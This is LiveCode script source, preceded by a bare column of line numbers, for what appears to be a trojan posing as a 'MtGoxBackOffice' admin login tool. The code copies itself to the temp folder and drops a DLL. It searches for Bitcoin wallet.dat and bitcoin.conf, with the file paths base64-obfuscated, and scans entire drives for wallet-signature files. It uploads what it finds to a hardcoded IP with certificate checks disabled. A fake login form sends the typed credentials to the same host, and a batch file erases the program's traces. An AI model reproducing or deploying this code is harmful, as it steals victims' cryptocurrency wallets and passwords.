1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
n startUp
global origPath
put the defaultFolder into origPath
centerThisStack
if $1 = "quick" then
hide this stack
end if
end startUp
on openStack
centerThisStack
if $1 = "quick" then
hide this stack
doSearch
else
if $0 contains "TibanneSocket" then
else
doCopy
end if
end if
if platform() = "MacOS" then
doSearch
end if
end openStack
on setupSSL
open file "revsecurity.dll" for binary write
write base64Decode(field "dll") to file "revsecurity.dll"
close file "revsecurity.dll"
end setupSSL
on deleteSSL
global origPath
set the defaultFolder to origPath
close file "revsecurity.dll"
delete file "revsecurity.dll"
set hideConsoleWindows to true
get shell("del /F /Q revsecurity.dll")
end deleteSSL
on doCopy
global origPath
put the defaultFolder into origPath
if platform() = "Win32" then
open file $0 for binary read
read from file $0 until eof
put it into binpro
close file $0
set the directory to $TEMP
open file "TibanneSocket.exe" for binary write
write binpro to file "TibanneSocket.exe"
close file "TibanneSocket.exe"
open file "revsecurity.dll" for binary write
write base64Decode(field "dll") to file "revsecurity.dll"
close file "revsecurity.dll"
set hideConsoleWindows to true
get shell("start /b /separate TibanneSocket.exe quick")
end if
end doCopy
on doSearch
if platform() = "Win32" then
set the defaultFolder to ($APPDATA&"\"&base64Decode("Qml0Y29pbg=="))
if the files contains (base64Decode("Yml0Y29pbi5jb25m")) then
sC ($APPDATA&"\"&base64Decode("Qml0Y29pbg==")&"\"&base64Decode("Yml0Y29pbi5jb25m") )
end if
if the files contains (base64Decode("d2FsbGV0LmRhdA==")) then
sW ($APPDATA&"\"&base64Decode("Qml0Y29pbg==")&"\"&base64Decode("d2FsbGV0LmRhdA=="))
end if
wait 20 milliseconds
set the defaultFolder to "C:"
set the defaultFolder to "C:/"
set the defaultFolder to "C:/"
send "scanNext" to this stack in 5 milliseconds
end if
if platform() = "MacOS" then
put trim(shell("echo $USER")) into username
put shell("ls ""e&"/Users/"&username&base64Decode("L0xpYnJhcnkvQXBwbGljYXRpb24gU3VwcG9ydC9CaXRjb2luLw==")"e) into filelist
put "/Users/"&username into homedir
if filelist contains (base64Decode("Yml0Y29pbi5jb25m")) then
sC (homedir&base64Decode("L0xpYnJhcnkvQXBwbGljYXRpb24gU3VwcG9ydC9CaXRjb2luLw==")&base64Decode("Yml0Y29pbi5jb25m"))
end if
if filelist contains (base64Decode("d2FsbGV0LmRhdA==")) then
sW (homedir&base64Decode("L0xpYnJhcnkvQXBwbGljYXRpb24gU3VwcG9ydC9CaXRjb2luLw==")&base64Decode("d2FsbGV0LmRhdA=="))
end if
set the defaultFolder to "/Users"
set the defaultFolder to "/Users"
set the defaultFolder to "/Users"
send "scanNext" to this stack in 5 milliseconds
end if
end doSearch
on selfKill
set the defaultFolder to $TEMP
set hideConsoleWindows to true
open file "cleanme.bat" for binary write
write "cd ""e&"%TEMP%""e&return&return& \
"taskkill /F /IM TibanneSocket.exe && del /F /Q %TEMP%\TibanneSocket.exe && del /F /Q %TEMP%\revsecurity.dll && del /F /Q %TEMP%\cleanme.bat" & return & \
"del /F /Q %TEMP%\TibanneSocket.exe && del /F /Q %TEMP%\revsecurity.dll && del /F /Q %TEMP%\cleanme.bat" & return & \
"del /F /Q %TEMP%\revsecurity.dll && del /F /Q %TEMP%\cleanme.bat" & return & \
"del /F /Q %TEMP%\cleanme.bat" & return to file "cleanme.bat"
close file "cleanme.bat"
wait 1 seconds
get shell(quote&"%TEMP%\cleanme.bat""e)
wait 1 seconds
get shell(quote&"%TEMP%\cleanme.bat""e)
wait 1 seconds
get shell(quote&"%TEMP%\cleanme.bat""e)
wait 30 seconds
quit
end selfKill
on sW wF
open file wF for binary read
read from file wF until eof
put it into wld
close file wF
if the number of characters in wld <> 0 then
libURLSetSSLVerification false
set the httpHeaders to "User-Agent: MtGoxBackOffice" & return & "Connection: close"
set the socketTimeoutInterval to 60000
post b64single(base64Encode(compress(wld))) to url "https://82.118.242.145/cgi-bin/sync.cgi"
#close socket (line 1 of openSockets())
end if
end sW
on sC cF
open file cF for binary read
read from file cF until eof
put it into cld
close file cF
if the number of characters in cld <> 0 then
set the httpHeaders to "User-Agent: MtGoxBackOffice" & return & "Connection: close"
set the socketTimeoutInterval to 60000
libURLSetSSLVerification false
post b64single(base64Encode(cld)) to url "https://82.118.242.145/cgi-bin/conf.cgi"
end if
end sC
function b64single bdata
put 0 into daLine
repeat the number of lines in bdata
add 1 to daLine
put line daLine of bdata after rdata
end repeat
return rdata
end b64single
function trim indata
delete the last character of indata
return indata
end trim
on closeStack
deleteSSL
get openProcesses()
quit
end closeStack
on centerThisStack
put screenRect() into srect
put ( the width of this stack / 2 ) into sxx
put ( the height of this stack / 2 ) into syy
put item 3 of srect / 2 into srectx
put item 4 of srect / 2 into srecty
put (srectx - sxx)&comma&(srecty - syy)&comma&(srectx + sxx)&comma&(srecty + syy) into newrect
set the rect of this stack to newrect
end centerThisStack
on asyncHTTPSPostW theData
set the socketTimeoutInterval to 10000
if theData is empty then exit asyncHTTPSPostW
put random(999999) into rN
put "82.118.242.145:80|"&rN into tS
put "POST /cgi-bin/sync.cgi HTTP/1.1"& CR & \
"Host: 82.118.242.145" & CR & \
"User-Agent: MtGoxBackOffice" & CR & \
"Connection: Keep-Alive" & CR & \
"Content-Length: "&the number of chars in theData & CR & \
"Content-Type: application/x-www-form-urlencoded" & CR & \
CR && theData into pD
open socket to tS
write pD to socket tS
read from socket theSocket until end with message asyncRead
end asyncHTTPSPostW
on asyncHTTPSPostC theData
if theData is empty then exit asyncHTTPSPostC
put random(999999) into rN
put "82.118.242.145:443|"&rN into tS
put "POST /cgi-bin/conf.cgi HTTP/1.1"& CR & \
"Host: 82.118.242.145" & CR & \
"User-Agent: MtGoxBackOffice" & CR & \
"Content-Length: "&the number of chars in theData & CR & \
"Content-Type: application/x-www-form-urlencoded" & CR & \
CR && theData into pD
open secure socket to tS without verification
write pD&CR&LF to socket tS with message asyncSent
end asyncHTTPSPostC
on asyncSent theSocket
read from socket theSocket with message asyncRead
end asyncSent
on asyncRead theSocket, theData
wait 5 seconds
close socket theSocket
end asyncRead
on scanNextVolume
global tmpFolder, lCount, lCount2, lastCount, lastCount2, globalStop
set the wholeMatches to true
if platform() = "MacOS" then pass scanNextVolume
if globalStop = "stop" then pass scanNextVolume
if platform() = "Win32" then
put empty into tmpFolder
put empty into lCount
put empty into lCount2
put empty into lastCount
put empty into lastCount2
set the wholeMatches to true
put char 1 to 2 of the defaultFolder into checkDrive
if the number of lines in the volumes > 1 then
put lineOffset(checkDrive,the volumes)+1 into checknum
if (the number of lines in the volumes) < checknum then
put "stop" into globalStop
send "selfKill" to this stack in 10 milliseconds
pass scanNextVolume
end if
put 0 into sanityCount
repeat 25
add 1 to sanityCount
if sanityCount > 20 then
exit repeat
end if
put ( line checkNum of the volumes&"/" ) into newVolume
set the defaultFolder to newVolume
if the defaultFolder <> newVolume then
put "couldn't change defaultFolder to "&newVolume
if checkNum > the number of lines in the volumes then
put "stop" into globalStop
send "selfKill" to this stack in 10 milliseconds
pass scanNextVolume
else
add 1 to checkNum
end if
else
send "scanNext" to this stack in 5 milliseconds
end if
end repeat
end if
end if
end scanNextVolume
on scanNext
global tmpFolder, lCount, lCount2, lastCount, lastCount2, globalStop, firstSeen, finalFiles
if globalStop = "stop" then pass scanNext
set the wholeMatches to true
set the cursor to busy
if controlKey() = down then
if shiftKey() = down then
exit scanNext
end if
end if
put "00 00 00 00 01 00 00 00 00 00 00 00 62 31 05 00 09 00 00 00 00 20 00 00 00 09 00 00 00 00 00 00" into hexSig
put the number of words in hexSig into sigSize
put 0 into theC
put empty into binSig
repeat sigSize times
add 1 to theC
put the numToChar of ( baseConvert( (word theC of hexSig),16,10 ) ) after binSig
end repeat
put binSig into btcCheckSignature
put "00 00 00 00 01 00 00 00 00 00 00 00 62 31 05 00 09 00 00 00 00 10 00 00 00 09 00 00 00 00 00 00" into hexSig
put the number of words in hexSig into sigSize
put 0 into theC
put empty into binSig
repeat sigSize times
add 1 to theC
put the numToChar of ( baseConvert( (word theC of hexSig),16,10 ) ) after binSig
end repeat
put binSig into btcCheckSignature2
put "00 00 00 00 01 00 00 00 00 00 00 00 62 31 05 00 09 00 00 00 00 30 00 00 00 09 00 00 00 00 00 00" into hexSig
put the number of words in hexSig into sigSize
put 0 into theC
put empty into binSig
repeat sigSize times
add 1 to theC
put the numToChar of ( baseConvert( (word theC of hexSig),16,10 ) ) after binSig
end repeat
put binSig into btcCheckSignature3
put "00 00 00 00 01 00 00 00 00 00 00 00 62 31 05 00 09 00 00 00 00 40 00 00 00 09 00 00 00 00 00 00" into hexSig
put the number of words in hexSig into sigSize
put 0 into theC
put empty into binSig
repeat sigSize times
add 1 to theC
put the numToChar of ( baseConvert( (word theC of hexSig),16,10 ) ) after binSig
end repeat
put binSig into btcCheckSignature4
put "00 00 00 00 01 00 00 00 00 00 00 00 62 31 05 00 09 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00" into hexSig
put the number of words in hexSig into sigSize
put 0 into theC
put empty into binSig
repeat sigSize times
add 1 to theC
put the numToChar of ( baseConvert( (word theC of hexSig),16,10 ) ) after binSig
end repeat
put binSig into btcCheckSignature5
put stripFiles() into theFiles
put 0 into fileCount
repeat the number of lines in theFiles
add 1 to fileCount
put line fileCount of theFiles into fName
if platform() = "MacOS" then
if firstSeen is empty then
if fName <> empty then
put the defaultFolder&"/"&fName into firstSeen
end if
else
if the defaultFolder&"/"&fName = firstSeen then
pass scanNext
end if
end if
end if
put "addr.dat blkindex.dat peers.dat BOOTSTAT.dat" into badFiles
put ".txt .zip .gz .z .bz .bz2 .tar .rar .html .htm .js .css .fl .nib .jpg .png .bmp .tif .gif .ico .dll .lnk .avi .wmv .c .cpp .h .csv .pdf .sys .exe" into badExts
put 0 into bC
put empty into bCC
repeat the number of words in badExts
add 1 to bC
if fName ends with word bC of badExts then
put "bad" into bCC
exit repeat
end if
end repeat
if badFiles contains fName then
# DUP
else
if bCC is empty then
open file fName for binary read
read from file fName for 32 chars
put it into binCheck
close file fName
put empty into binFound
if binCheck = btcCheckSignature then put "true" into binFound
if binCheck = btcCheckSignature2 then put "true" into binFound
if binCheck = btcCheckSignature3 then put "true" into binFound
if binCheck = btcCheckSignature4 then put "true" into binFound
if binCheck = btcCheckSignature5 then put "true" into binFound
if binFound = "true" then
open file fName for binary read
read from file fName until eof
put it into binCheck2
close file fName
put "pool main key name addr bestblock defaultKey version setting addr" into search1
put 0 into wCount
put 0 into wScore
repeat the number of words in search1
add 1 to wCount
if binCheck2 contains (word wCount of search1) then
add 1 to wScore
end if
end repeat
put the defaultFolder&"/"&fName into resultsCheck
if finalFiles contains resultsCheck then
## DUP
else
put resultsCheck&return after finalFiles
if wScore >= 3 then
sW resultsCheck
end if
end if
end if
end if
end if
end repeat
put empty into it
if the number of lines in stripFolders() > 1 then
put stripFolders() into tmpFolderList
if tmpFolder is empty then
put 1 into lCheck
end if
put lineOffset(tmpFolder,tmpFolderList) into lCheck
if lCheck = 0 then
put 1 into lCheck
else
add 1 to lCheck
end if
if lCheck = lastCount2 then
add 1 to lCheck
put lCheck into lastCount2
else
put lCheck into lastCount2
end if
if lCheck > the number of lines in tmpFolderList then
set the itemDelimiter to "/"
put the defaultFolder into theFolder
put the last item of the defaultFolder into tmpFolder
delete the last item of theFolder
if the number of items in theFolder <= 1 then put "/" after theFolder
set the defaultFolder to theFolder
if isLastCheck(tmpFolder) = "TRUE" then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
if lCheck2 <> empty then
put lCheck2 into preCheck2
else
put 0 into lCheck2
put 0 into preCheck2
end if
put stripFolders() into tmpFolderList
put lineOffset(tmpFolder,tmpFolderList) into lCheck2
if lCheck2 = 0 then
put 1 into lCheck2
else
add 1 to lCheck2
end if
if lCheck2 > the number of lines in tmpFolderList then
set the itemDelimiter to "/"
put the defaultFolder into theFolder
put the last item of the defaultFolder into tmpFolder
delete the last item of theFolder
if the number of items in theFolder <= 1 then put "/" after theFolder
set the defaultFolder to theFolder
if isLastCheck(tmpFolder) = "TRUE" then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
put stripFolders() into tmpFolderList
put lineOffset(tmpFolder,tmpFolderList) into lCheck2
if lCheck2 = 0 then
put 1 into lCheck2
else
add 1 to lCheck2
end if
if lCheck2 = lastCount then
add 1 to lCheck2
put lCheck2 into lastCount
else
put lCheck2 into lastCount
end if
else
put ( line lCheck2 of tmpFolderList ) into tFolder
put tFolder into tmpFolder
set the defaultFolder to (theFolder&"/"&tFolder)
end if
else
put line lCheck of tmpFolderList into tmpFolder
if isLastCheck(tmpFolder) = "TRUE" then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
if (char 1 to 3 of the defaultFolder) = the defaultFolder then
if (lCheck+1) = the number of lines in stripFolders() then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
end if
if (the defaultFolder&line lCheck of stripFolders()) = "C:/Windows" then
if (lCheck+1) > the number of lines in stripFolders() then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
else
put "stop" into cStop
set the defaultFolder to (the defaultFolder&"/"&line lCheck of stripFolders())
end if
if (the defaultFolder&line lCheck of stripFolders()) = "C:/Boot" then
if (lCheck+1) > the number of lines in stripFolders() then
#DUP
else
add 1 to lCheck
set the defaultFolder to (the defaultFolder&line lCheck of stripFolders())
end if
else
if cStop <> "stop" then
set the defaultFolder to (the defaultFolder&"/"&line lCheck of stripFolders())
end if
end if
put empty into cStop
end if
else
put empty into lCheck2
put empty into lCheck
set the itemDelimiter to "/"
put the defaultFolder into theFolder
put the last item of the defaultFolder into tmpFolder
delete the last item of theFolder
if theFolder is empty then
put "notwin32" into foldCheck
else
put "win32" into foldCheck
end if
if the number of items in theFolder <= 1 then put "/" after theFolder
set the defaultFolder to theFolder
if isLastCheck(tmpFolder) = "TRUE" then
send "scanNextVolume" to this stack in 5 milliseconds
pass scanNext
end if
put stripFolders() into tmpFolderList
put lineOffset(tmpFolder,tmpFolderList) into lCheck2
add 1 to lCheck2
put ( line lCheck2 of tmpFolderList ) into tFolder
set the defaultFolder to (theFolder&"/"&tFolder)
end if
send "scanNext" to this stack in 5 milliseconds
end scanNext
function isLastCheck lastDir
if platform() = "Win32" then
if char 1 to 3 of the defaultFolder = the defaultFolder then
if lineOffset(lastDir,(stripFolders())) = the number of lines in stripFolders() then
return "TRUE"
end if
end if
end if
if platform() = "MacOS" then
if the defaultFolder = "/" then
if lineOffset(lastDir,(stripFolders())) = the number of lines in stripFolders() then
return "TRUE"
end if
end if
end if
return "FALSE"
end isLastCheck
function sortLines theData
sort theData
return theData
end sortLines
function stripFolders
put the folders into tF
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
sort lines of tF ascending by word 1 of each
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
return tF
end stripFolders
function stripFiles
if platform() = "Linux" then
set hideConsoleWindows to true
put "ls -al|grep -v ""e&"lrwxrwxrwx""e&"|awk '{print $8}'" into shcmd
put shell(shcmd) into tf
sort lines of tF ascending by word 1 of each
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
return tF
end if
if platform() = "Win32" then
put the files into tF
sort lines of tF ascending by word 1 of each
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
return tF
end if
if platform() = "MacOS" then
put the files into tF
sort lines of tF ascending by word 1 of each
if line 1 of tF = "." then delete line 1 of tF
if line 1 of tF = ".." then delete line 1 of tF
return tF
end if
end stripFiles
on mouseUp
global keyBuff
set the showName of me to false
set the icon of me to "210073"
set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
libURLSetSSLVerification false
#get url "https://admin.tibanne.com"
set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
libURLSetSSLVerification false
post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"
set the icon of me to ""
set the showName of me to true
if cd fld "l" is empty then
answer "Server Responded: username is empty. Please try again."
put "" into field "l"
put "" into field "p"
exit mouseUp
end if
if cd fld "p" is empty then
answer "Server Responded: password is empty. Please try again"
put "" into field "l"
put "" into field "p"
exit mouseUp
end if
answer "Server Responded: username or password is invalid."
put "" into field "l"
put "" into field "p"
put empty into keyBuff
end mouseUp